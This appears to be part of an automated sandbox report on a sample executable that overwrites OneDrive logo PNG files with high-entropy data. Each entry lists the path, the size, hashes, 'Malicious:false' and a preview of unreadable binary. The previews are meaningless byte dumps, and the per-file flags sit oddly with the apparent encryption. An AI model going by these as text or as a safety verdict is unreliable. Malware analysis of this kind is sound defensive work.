                                                                                                                                                                                                    Preview: ,..ON"..W.!2.^.+......_......y..A.~Y..h...?...g_..j.....=w.2.2T...U`..v..A....1.....X.2...!pj.`.hQ\GP...i&.G.~...hq..{..v..xA.MA..qX.?....W.=s.....U..;..8-..8c.9V}.....|;...\.!P........p...\.rv..)h<4....f......L.ra59-7z,..caP..oTZ..R.U(sDv.v.....9\.m..+HU..(.......?D.._.......O...L.g...dd.J.ZS.)..pD...Chh.hN4.[Vv.{+D..w.v."C.Gc.l...gf_$7.hy1....&g.C...R2I..3w........2.{.*..s...>l.....U.. ...!n.....4..D...t.]............O..7;`w..i..!..~........?..~.njt#.R#s.....[s.0..k..|..a;+.,.o..=.CK...I...Qy..D.uqD..n.....?#=Q....../.O(...q(t...h.1.LMZ....*..Z).......]...B...@.*.D..s...V/...|...U.gT..t..`.?.........D..O....I.h....P....N.?]].X..oh.)N.....b....."h5;.o*.&)k.=........@.5...b.z...V&S...s.Z.Hw..{]HI>..0Xd7g.[....k.Ux'..qb....{...9...Hw.Z.0.$|..+A.nb....feNF.m!),.%..5aJ3.....6.c..H... ../.....h?..=.d\.t.S...._.....b1.|.e...e....=....h:..A..nJ.........y.-[0...^N...5aT........N.a...v.1.V.0.....DJ.P....p.2......l.S.a.... .Q....w$!en]...T(....K_b.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-100.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3300
                                                                                                                                                                                                    Entropy (8bit):7.938657329051502
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:sSsjC9Vg+7119DJv4RtfG1N1o0O7GaOnMt7srqNZoNldmtG25Y+Jmlao8U+xtaQD:DsajddYtub1o/7cqL6dmTTJmDCYM
                                                                                                                                                                                                    MD5:0A0163DC69CB325EA7C3B3F89578B83E
                                                                                                                                                                                                    SHA1:41A0E8155F7C866F38AE64AD9531F9659C345C71
                                                                                                                                                                                                    SHA-256:E70E7E713986F2D5AA30883C3DF8B5F7CB1C98FB7678B79BE7A054EECA83B973
                                                                                                                                                                                                    SHA-512:3BE8EFA0F77D3EF5ED1232623DCD605B5995B8E5C8B1CE8B93A844C1CE12189F65E209CD84E80EB4FDFF4C9A059CD1F3A87A1324819692C8ABFC269894F82071
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: k..u3.pB..@vY..nY=..<.X...>r.<...$s%.GM..S.....(..Y...Laz..N.8.........FE.+.^?.P.p.9M3.....X.k........../h.b...z.......(...AS..gA}..I..9...%.dm..1.e.../........d;j(..{..S...9..0...x3.0xU.6.5J..=......1 ..u..C`.'$.....9v(d...0....r..W)..d....Rb.G.....~...[..Bl...|vN............hB..TO.D.u.;_.V....._...P.j.vOh..!.U.i...K...@@I.P...I.....?.+u*-.=u...n.cm..p.iQ......1..$nY.._.kcQ......iS........7L....s.yJ..&.p....U..]..>...r'..........S.(....K!.....t..e.8.D.].W.......N.JI....3..&A..^..>.......a].(.....&...........N.Y.D./.t.C.jw.*.....S....YN?...(.*}...a,.Z.R. ............]"$.....,..Q..B`....Wh...pR...=.=....Lm<. -L....z..9Ar.7.....$..?............_...z.4u..u..eD.#......%#!.....a4q`~g...BUsxP8..%kil7S...i.l.;.|..._...W.R..7.[k..%H.t7W.?...)...=|..<.P4.....q`j....&|.5j..v.&FM.x..)...zK.....-.,.vU;..x...K?u3E..S..\.{.w. .4S..!.Jp..UEL.." .2....J.n.`.Q.R.......)..m....qT..o...J.T|...q....#.v....Q...ZO.....y....O.~&..B.!c......O.%z7o.q..=F.p.c.f]W
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-125.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4436
                                                                                                                                                                                                    Entropy (8bit):7.954115027526741
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:vWYfjEFK3Nh9EV4QePxZrrZs40OVa5X46e4DRS1qVJygX86N3vjqP:vWo3dEV4Q2rqO45X43yS1eJ/s6hvju
                                                                                                                                                                                                    MD5:A058730E96C056758C2DAD2DDC8D9432
                                                                                                                                                                                                    SHA1:2D690FF5B7DFF9B8CB8C7D69AF9E72D5E3B8C46D
                                                                                                                                                                                                    SHA-256:24EADFD5C4AFF872913A42BB8F6C06B93131465F10D258C809C74FEF3DEB36F2
                                                                                                                                                                                                    SHA-512:F64F0D833425B1A34FCB1F6ED2006F4F6FF8044268E42A2F3B20AC2A42F740DAA96CA84939255B9B085708D6235E5CA2B8BE3975749ECDA4AA0751648CFAD394
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..Rq...6!..pF..^.............VLz...K.}xo.%...J6....n..=.....&.,v..,..SZi.:..~.A....E.w......dq'..^S..I.mm..~I. .y.C...5.6.>.;......TA.<....o.8B.y3...Y..t... .b.......j..N\t....Z~y.R.....o.3.O8.H.m.............-.o......9...{$%.-U?w.U...d..[gS......G...>p....e}...}}2i..=....u?....q;p..(...._d..n....`.s.E...X.t...!N.....a.}6.4.....$o.V...#..n..3./..M.//(U..H..!.i..dW...Q.k.W.p...q%_.m...........q{..T0.W..~[.LK..{........)0'7.3....~..an...../..jp1tb&.6...u.VY 5..e.p..X.qZ.[.,.V...g.......4.x:..j.~<.......Rf.....(.,+.I..w7.:....G. X!W.N`....0..m:...7R...(..r:?..Lh...o.....xi...u.^...+.9..E.....{/.d...l._...9...3+....Y.y{B......K..T...'.{Z..H..Z.P.A.,H ..4...j.O..#^...F.V.Is=_N@....8...ab0.1....dBe..t.uT."H"w.....v<...f;.D$G...1N..-V_-...\.z."z..-=V........a5.Y...H..w.].F.....)..7..Lg.jI:N.CcW.......H..>|...?.M..........?...\.O.R...Z...;...[?u..f..........E.Z.../m.Fp4.H.B....8.S.E.T.=9z.W..........d..6XT.1[........H.{Y...p.i......ZE1$.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-150.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):5627
                                                                                                                                                                                                    Entropy (8bit):7.973908770279031
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:EGi/BjrJHskg+cDVQ6cmC02opEydbDKiYTCGcbcSnWLYjIYxbCoBX:EL9H4Q6QoplvKHCGcNNv
                                                                                                                                                                                                    MD5:AA8B6D50954C587E28A895FB51973BC9
                                                                                                                                                                                                    SHA1:4F7AA276F32B5ECEFAB38534D908B11A7D9D75AA
                                                                                                                                                                                                    SHA-256:3605E6D3ACFA70D8B47656487683EBF5E54A5FF9EC9BB36CE9258DBBD48DFCA7
                                                                                                                                                                                                    SHA-512:DA1AEEB8228CC312E3AE0E98FD764C050DDCCE1A48522D91AE07A80D42E81496A979F94BF3FB10BEAA0091D64890E5426982BD3BCD702A2B693A12F1574B3B96
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: H.Xg..e..z.R..Tc./.......'.V.b.G.^u.[..H..Hp....>..._@..6q&...j.0..1B.2\...p.J.aUJ..,.H.3?ui....e....)R.fs.d...*.....jr......k0...i`P.o..A.^.c.........{%]&......`.K*j..p..;... X.k.<"B<.wp...#.D*.Z..a..&.ro:. YQcXK.1..}.....[.l...X..............~P#.....}.|h.DB......L...3r/V.u@v...U.....(.)...1.....t)gW.!+..OWO/....P(.}K.M.(.Vq.@.V..:Q.`..ZR.......bb(...].^.,6@....|.....M.=..!..A.H<.c....4....:..~.Z.P....."6.....~.........(......%V.....*h*..f\.u+.O4.lU.TQ....y..v...C.]..+8z..a...@}b.i..1..9].#..3IL........o.P<.l.>......VE=.;.......1$/.RN.DM.....)..i^..+v0.<}.....5..a0h&.n......9.x.>..4.NzT....~~$..4.Eh....O"i.Y,.m~..e..o..\.W.F.C.[..Zb..R..q.....).7r..f.r.C@.n..Y..].wN...z.7.E.{.s:.).XJ".Z).J.Y$.....;0.=.0.Z..x......=...>|..S...W%3.......y....m!..l....G......A*..........v....'.I........Q.*Y.=..\.0.&2h...<O|%/...eb.T........~K..|.0=as.P.7*.B.-<...+.....Zf...o6........tf.;.?j....6i...|I..h.....W.....&P.8..P.}?k...5.....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-200.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):7273
                                                                                                                                                                                                    Entropy (8bit):7.972641705458741
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:WioYytspdvZgbEtvSvjI8y6+DivIhAzMlXyhnGwi13zVn4j4cAN6OiOq6EvW:yXq/ZgbgvSvjJvpiXyhGd1DVOYS6F
                                                                                                                                                                                                    MD5:053240A91AFA83EFACE9AD4A9F81F296
                                                                                                                                                                                                    SHA1:0C265A53EEA7876C88864B27F4CD55031430E26D
                                                                                                                                                                                                    SHA-256:46398AFB3E4E7094AAFEBBB027B4E96ADC95306CA0FD228FD9850B65F0D9F31D
                                                                                                                                                                                                    SHA-512:4083EE6352298417E62E403DCE29B9DAF9ABC3EF7B68E09B365E67C246B43F4A79DF0669CD5859D283EEAE6DEF0C4D9A4E4DACBD940362D3C80FAFF031338DC0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .Qc.k....u`.6|...9:.(u....1."...)x..%?.[.ky."..J.E..6W.E..e..42PX....v....'.~.3.2#WK..A.u.!.V<.OP...y2..sX~..Jl..?..IWZ(?1n..o..~.c......o9;kH.....t.o...Z/..@.%<.W..*..i<.`A..?..C.yXVt..p..u\{..E...Dh......T.U.\M..[.Q.O.r..Y....|0W>..l.qn.[.$.lB.X5......6\.F!.H..x... .s..P.l.'s.Y....y..6L'.h5q?....#V.P......2z...........\..~...$......d.FQ..w^.....C?L.G....X......~...h..2..3...GT1>Q..K.q.d.=...gy..jM..z.[-.K}.*3y1c.=@)..n.2...*..A0[.x..B.2....N...p..!..>mkW..$V.\m.1S.x5...P.5{.....'0.U...,..Q...!@+%..,9.2.240....Fr..G|I.......z!].Z.F!6..fy...6..XxH..Z,$B=...(.$..._.G....(h.P..?V.]].My..NgG^#.o.r........).Y$..H(n....mz...3...,..xi...."...x@.....}....7.......G.G.....s.sP....w7p.(2Y..T..\.....Z.U.HL.,.....:x(w.......Y#......}.X...T...L...fL....0..[\..S..)?..;^L*...pw5/ 'YL..Pe...i.iU.g... ...........MwtC...... y.)a.HZg......}.To.9..."..../...x.Ka..1.wd^......5...T...+.K.y.A...nH"...](E#<...2..bf.vY/.#i....-...8...<.e..K.{p(u0qw#.....*Nk..;....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-400.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):16261
                                                                                                                                                                                                    Entropy (8bit):7.987967565667498
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:NqowL6cr50HJVrQFCsOWvaQ8Vs59V9q93Y8tSI/zVl3l137F:NqowL6cr56KFCpST8W5pq93jl/BZzx
                                                                                                                                                                                                    MD5:6A7FAB5842E86C0E38F88BED50CA977B
                                                                                                                                                                                                    SHA1:FDBB2911959F25768E376B0E68A287F7976EEDC5
                                                                                                                                                                                                    SHA-256:285852DDC12AAE82D14AF1B3FEB964DA2E8368D1781F772A715F15860A0A16A7
                                                                                                                                                                                                    SHA-512:47AB8374949C50BF59ACA054DE4E1FFBDA32DC1513ECFC8C686B70BBA51BB4DE5E83D4F4C8D046BA743EA0062972BF57A009F47ED4721907A49BADFD9E418326
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .4....W...yF...H........l.X,).6)...u..]........kD.E.YN...r.....=.....5<..ult..8..(...(R!.d8.|.`...V.0..D.T"..c..i.j....D.0D.>..$..t.c..B.R`g........C.P...Dw..j&..i...[x".el.3...J.TO.&......$.x..V<.E... S._8....i.......N#.~=#.....p....BEi:.f..V...e'....-.z..#..mHP..49`.\..(Y.b..jG.o...r..0.3.B(........H`.,..+....\s.&....-..8.s.|.......{s9..7.B....U...5.Y..%..i..+.:.Bn..M...U...X.c.o...U......6.:.R..u...C..]..`..is+..;...]K.*+6..@..C.C..I.I....v.60&]H.9.......U..vK...[.J".U.*..9`...4.....T../.4h./6......1..u...r)3>..r0.....?.#..^=.....p.R`K=l..O!..1...Mz..9VB|.S../.....e.....m...[.z..e..d.d'..........l.,..U....*....u!.]+..V.K.....L.Q..3.....X.zc......X.....GI...D.md...B.'&......D.......H..:.u../.<+..d^.......{|.....#+.5.....t..F......nJ...;.D.<s. .4..y....s.u...2...r.a......%3......E`RO6.{.........s....<cjx...RM.H.{eqL...."2...j..4..P..`......dq.K.L._*=....nn .l..p=.....L=v.ux!_.l`<U:X)....fJ".k....lM"....;D.v...m.N...U.Ku...-....5.R.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-100.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1112
                                                                                                                                                                                                    Entropy (8bit):7.824062119930214
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:rIuxLtIDT229uny3wdhaxNaWWkqMsK3lV/Cn8NANsIAcPf6jbzPaNbD:scb290y6hGIkQK3en8u3CfjatD
                                                                                                                                                                                                    MD5:DB73D298D71A416A7253FB72C7868183
                                                                                                                                                                                                    SHA1:F3F699AF634774B378F9F88904E0A3E66A483866
                                                                                                                                                                                                    SHA-256:C55B064281BC300291B69676A82E0140D71C63694FB736CE3F223BF1E1186862
                                                                                                                                                                                                    SHA-512:6E8690FBCE7B97F9D62795DDE0D7F2FD76CB313E8D4FD45AACE880C91CDBA39987F73BC4FA9EF07C0C3268822C5C2D328F18A324076FAB6757BF78BD7D40F566
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .[..#\..59%...P...W.o,q.B.Ca.,...F...{k.P.HR...b..,.)Gu...kBc.3l.i-...C.Q..)P.y....J..a.i....Z.t.:>.".IK.z.......-.N..$B.gc.X1d.~=.'.O.....q.y..UL.dD.......#...!gl..~E:.U......'....j.s..'/..M....9...U..L.......4F....f...."N.hy.....q...$...j].Y..E6...t..\...h.=.!.#u.#.<.....2.c.~J......v...Q.bF.D.....@...(......)k....A......h.;....~S..xQ.e-u.D..a.#.$.n*....'?.vd.B....{./Q.[..Xk.K...l.:\N..-.'.L..Vg.$7..t.i+.r).....p-0........fSx5.....Ap..o.._8..U..........8.l..%.c.b.&......C..t=.p..]SS....'...f...8U.HX....gj........Id.7>W..|.*Z2../G.V:..6.-]...Keg..,d1@P...3MA.m...._.=..P..(o`..U.bd..h]``..g.>;.*u2V0..D.a..amy.i..rO.....J@. .).M..U.*..vl.......D...a.4*.X.m...v.X....4#../".y.\...T./...Z...O4e.......L.Aw .[vJhz...uW..Vd.h.&.H..N.\..G..%..Yh....m.)2.:.....(.z...e.y......V-.^..0n....%..}i...b..|~.0 .q..OP......P..np..!.#........h.M3......F...lH..!..2...~?h../..!.....NGI..c.#.[l...[C2....L.I4y.w.=..w....i.`K.)R..p.?X.d].......@..{LK
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-125.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1347
                                                                                                                                                                                                    Entropy (8bit):7.847011105686083
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:7JB4Zpl8ugopy/7umTSJF5GRoJL79Lm85pD1MifPKr3altgxAC4eiUzZ4bD:wnyimTSJF5SULtmAD1MifCTaltgYlUzQ
                                                                                                                                                                                                    MD5:6726936403B8FD6E8AB74575DC4D2213
                                                                                                                                                                                                    SHA1:85E69C5331B32EFC7D461855909D7B4323E6E55A
                                                                                                                                                                                                    SHA-256:149F3F6E1B4F77B0B06336E4EBE0F77849DDFBF1FCD6D8742D1144D9BA6CA66B
                                                                                                                                                                                                    SHA-512:000ABEAB64616F8F8F25E34B6D1638256BB2E2C37DD443A84B560438910EA8BE4D09C0B6EC4A52E10AC2302CA037F6EAD240F0791476BDCA351A941DE72D62E7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: t....j.pc......EH..b...6b..sCF.<sq....6.t{....N.o7H.A,P:....`.Q.b..>.&v.4......0C.n......$w.!....Zc......G.)..0..R.2\W_.."vgL...\.O..U3.uA.&..."..e...v};.H,...=.=O......d...)?..T.Fm.".04..d...#A}..4;..>..F4.u...zQ.kB..3>[d....9&.:n..Q....<...{.......sc.u..Q..4.UR.Xb.s.."Dz..1....z..=...@. .}.....o....l.#.MT.a...........M].V...j..G..AQ.r{.u....<I...P...:;.n...E.VN....*..l..}.....l=..A.9 qC...p..*.....P.2...$..a......0...."..!...b..Wq.W.j-..W|..F/.$.'Zv...HV..K..[..k.:BP...G .8..9Mq....\.,(.....a$..,.5{..}..||[^....#....P`M.1.:.6..z.;+.8......bH.....Z:..q....[S......_....j..?....h...... .<..ZACm.N...$......9....`<.~+.-3.7.$SM......$.?.Q[g.....yI6?.xuni.7....vA[..`.l..9@Kx.4.nj.E.}.#.....Nf.......'.k.1..N...'7@Y.2(!Cg5)..+.4.%~.+6;%...*.o*f|....r.n..Jry..m.6..A&...........F.1.:+..>..%X..1.|#.. ..w..3.[t%.L... .?m...G-..{..... .a|&.l......N..G*Z....+.:.:@.x]2jpq.F.h.]..SN.......$....l3....v...7.A.p.=.>.E^..0..0....Z........Vx(D.h......3p4..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-150.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1531
                                                                                                                                                                                                    Entropy (8bit):7.868126972403179
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:d0L6o8CtWE7050Xy/d+O+4St3z7WsdntI1bjx6ZsltejYGGPgzXbD:mL6o8fruylH+DZntI1cs/WzrD
                                                                                                                                                                                                    MD5:A5FE219BA1BA62E86DAC0D3BAD88A19E
                                                                                                                                                                                                    SHA1:9F6C85AE07C0B3A42A6A2115149170DE68B4B0A1
                                                                                                                                                                                                    SHA-256:FCDD61A964EBA1DD3EE4E18696D70D57A50B76FE9F90149BB8BD429E6D67A68C
                                                                                                                                                                                                    SHA-512:DAD62DF8274071DF7662106BB1522114E20ABD4BA9FF390167B737048E346E71CBB86CEC2A6F4521BF04A56C510601C343364B345DD8EAF9C93199D7B13A0B12
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......=.IL...-.1......Pg..R.K[._.n...E.M....,.u....f..Lay$ .....H+~]...@6...J..r..Q..{ .....[.R..,<.'.y.Nr32.k..{.YV~.z.~.....z.w&......w>D...F..Z:.....Y.m......J.iIT;....G9.*K.V.$....4k.`....k......;}...v.6..........'X.{. .orM..Z.1..Bt.k.^~.D.8...j.F.^..k.k.....V..`ku".....K..m/..OB....O.e=_T.".....D}."....G..^.sl7.ep.|7..1.\.C.M...Q.z8...szJ..8&.x.l.\.V..U. .Q.&q.l...S.R...->5.[......Q.G......,p.l..d.E.....-.@..d..`]J...u.4I.Gz..Ka.2.B.../..<3.....[&..=.|gPGR...3.6.....T..K.>xO.x.X....u7&.........I..M....x.g.J7L..)U.fU..%.P...b.$Z..4.(......Q..o!.-y...y..`>..[._....P.....<.......4dA...,.q...4#0pzZ.u.........O..9$.U.(=.(.!........6(_%.nQ...._......D..S.}-......B.S..ZM....@.7.k.,0e..C.M*.M...Tp..+-..>....H....".".k..\.1.D.s....[.Mexs.TW}y......* ...;b%;].`O..|.A>=`"..w_..%B.......v.ZX.s.J...pcm@|.p&...-.srZ.TD.Ei_PG......X.D.h..... -3I.....T.6.}...,..3%8..\.fJ~5.h..X....~$...w........h]k.........zO9...s.~.>..........\I.`.l.3....+.....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-200.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1971
                                                                                                                                                                                                    Entropy (8bit):7.897190832869648
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:lliXDEmjIOoCUDKWqp3KIX8+k/ORsC5NhfiPQjH3X2i5sR1D:LODjqtqVxfNRsGfiPQjXX2lRN
                                                                                                                                                                                                    MD5:904235B51CF57765DA951AE2C2B2A6AD
                                                                                                                                                                                                    SHA1:4964DC9C7818D96F9EFB0B334BF88631304C51BC
                                                                                                                                                                                                    SHA-256:8958A4FFEC82EA99B896C1CBE65EE6296E991FDDCA7BA9CFC567125655735CDC
                                                                                                                                                                                                    SHA-512:590EDB5F88D8AA30A0895B5B576BAC96CCB765CA4D581D6E69A064274A5093F97A4F7B7C30CD40769A90AAC8DC4073B462DF27441E021958C285A17348E9AEAA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .\.ug.7[....z/..#.:7.j....K.t.?<..E.].......J[..d....%..UapoQ)n.....,`..}.O.....$........n.zF...-=P.,j.......*.H./#_..VTo...m.6hka&Qfy.-.8e...i.J>V!.....KS.(r7...I.........t..]v7...|C.g.G/.5o.Wa...m.....\$.....BU.....t..C^.....|.u/..+.0?.]...x....z;..?.'=.}n<.j.-'..+...)......5.O.\f.~..T..j..7....3.F.M8b.3....l.../.}...........VjuRc.)......5.p..$.e....q....uq........:..\.....E....L[....R8...xM.. ...;.......(..V.`.~...1/.....&...md...}y..1l&.e-.)..Bv...>.....6B.[g3z]SEpt8..T..a.h+.A.v.f4x^.*1$.N.F.o..z...(r.(.O5..5:9.2.^...Po....{..x....m..a......b>.YT...8.3|.j.(.Jg....i.v.Xwm..]....*H...8.j.-s._.. \6..Y..J..#nU.A]...s..r....ei-^..We.p7...h.......o.......%T...A.c'v%_...w.sR.:#....Ae....N.f.n[....cg......1...-..K..Y]..d9.\UQ.HP.9"0.2.l.m.... z..0....?...ao......A..{...E:.l...).M...{=..?o..:.8.{....NJm....).......nvL?....G.M..g....x...B..N_...=....[..Z.E)......_by.XF....b.:,....M....Ii./.'....]>M....U.C&f.|J.'f...%..T,...j*.C.<..K ........)
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-400.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:PGP encrypted data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3805
                                                                                                                                                                                                    Entropy (8bit):7.946994291293712
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:b4/L8zY31/kYQnO6LfvRqq7t+tKracs7LPk:b4/3l8fpqqvaLns
                                                                                                                                                                                                    MD5:DC80A3858A91A0055167B4EB35BA1357
                                                                                                                                                                                                    SHA1:54CA9B3D75D35C528264B51E88B1AE48A986578B
                                                                                                                                                                                                    SHA-256:FC1AB3E885BAA9BE28BACBB818FF121C2F8E433D7F7BBB5356E563FA9C41C04F
                                                                                                                                                                                                    SHA-512:C0725DB0E626B7A12037AB1BA76696AE8EDBC6B7DAC8A0287B2D79F45A73458822979B73AA741297CA5A294CCA5DC50206DAA9A9689A5BA9C963533A60FC3FED
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..s..`R5.....`...d...|W...~V.Y..........l.2q./m..^D..(#...q...,.a..r..X....}.R.+...Zf...?.|...d1...q.Q8s.s4........?.'..b{N..._....wP..E..a.s......l....Y...."..M..W....x:...+..A.W..T(ki..Z>..m.i...+..$.d.....d...S~...o...~.d..u..1..^..v.W..z..x.>.Gz..v....~lc.P.....\..y...&...c.F!...Pq..W:'.h..;...).sHO.0,.S.=..v.0..@..0.... d./.Qu..-.v....v.`q.\...k|.n"..&..k...ouMpy>..Z.cS...4.J..3..2.k.g_}[....;Qv.LZ.+%.S`a.Ev5.A%0.....k-c,.W#..u.W..au5.?B~.....Y.......T+......<.YE....../C1.nv.......d)..v...j.....{Z.e3..^...T...s,,.$.G...<..O...W.YD...%KD.P".../a..NI..S..a.......mrq.....M.#.b..A..&..]..q..[.."....~\h...(K.. .[..u.x..H....xW..T..:..7..s....,.....1-z....v.L.s{.&..v bzU>.~.... sZ]p]..*.. .|.K.Wx@[G.k..(.}^....l...'~u.>&.g..(v;3.G...wV~.....JT.#.g...V..P...........T..~..w......CN]......F....VGW.P..J-h.<...gv.0u.Pt.......H...`.......jvf2.....!a.B.Rq..a..gj..1...y.)j.5tc&?...X.....l.ucy.....M.....}S....lA....E..O....n~....1'..7.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-100.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1112
                                                                                                                                                                                                    Entropy (8bit):7.816294319300947
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:EIjqq/Sg2oX1olsDaYW0rMp2/NG4wcxx+GscbP5xpd3fbD:EI24v2/sdW0aKGRyx+GnP5xpd3DD
                                                                                                                                                                                                    MD5:6D27C1CE663A9CEE554433E7A50378CA
                                                                                                                                                                                                    SHA1:69504804CFD460A7B949F9E17FD6E8E4A22493C4
                                                                                                                                                                                                    SHA-256:7F168B2162B954C2460F7454C36BC25F92A8E3CBA290E44C0E6FE8C727265D1E
                                                                                                                                                                                                    SHA-512:C8E8652342F9B93428B8804404AA6B14F7A5D443A09708FD622E70573BBD11DEEBDCD1EE69B7DFD53D4AC88EC7DCB62FFA1111D501043CABAD2E081E3A7732CD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .xo....@v...i.T^...IQ.5.".....-rK.mv.=.."..5...z.........0...[G..".....4(..&<..f.O...Bc..o.Md...."../.A$..A..N...\.W.C..K~~M.3>T..q.#..T.....3.p.....h..|4h.YQ.....2.e`'..........+...Z+..C.................F.^.?W.".T...X\....5.7...k ]..`.P.......V..}....n........ ...|WG8.@*E.......M.4x9..{.&\.%bm.J..'.m..C.......J .<..qe.,#7.m..tb...S.ubo.\.g.'...|.X........".h.$e.....0..b.....hk.......Y.-....;..J..?......,gU?.C@. 4.=...........{a._1......0...=.;..^.$^?j.pv~.cS?z%..@.`.O.....V=OW"....!....GJ.e.&.'.#.....Q.X.....$...xF(._..R.9..Uy;#..X.F.0|..I..'..........;x..(.h.Yt....w.f....M......Y;.A.rFG...y.f.dp...9.:..A..G...5"....{..R.P...h./.N...lF.?H! ...X.....Z,....g...YY.....E..I......L..K.=...^........v.>px..........a.[.4.......a-.^...wU...d....x..\. i....B..T..D ....L+/.c.}0...yo.RK9.v...cS..P...;.&...M!H)%.bz`.....f..pr...k...i0.\T.0..kL..qT..yS..8.S....?O..cR..7....n...............%..3A..i....y......J.#....../..'T..#mj.0L...I#y...q.;Ks..2.@+.g
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-125.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1347
                                                                                                                                                                                                    Entropy (8bit):7.8473108691228415
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:mYPTvQ874dXgKor2fCx1S5ocxyINOLz4CbwIwZMc0ZLbD:hPTvQ80dwQno24MZ61D
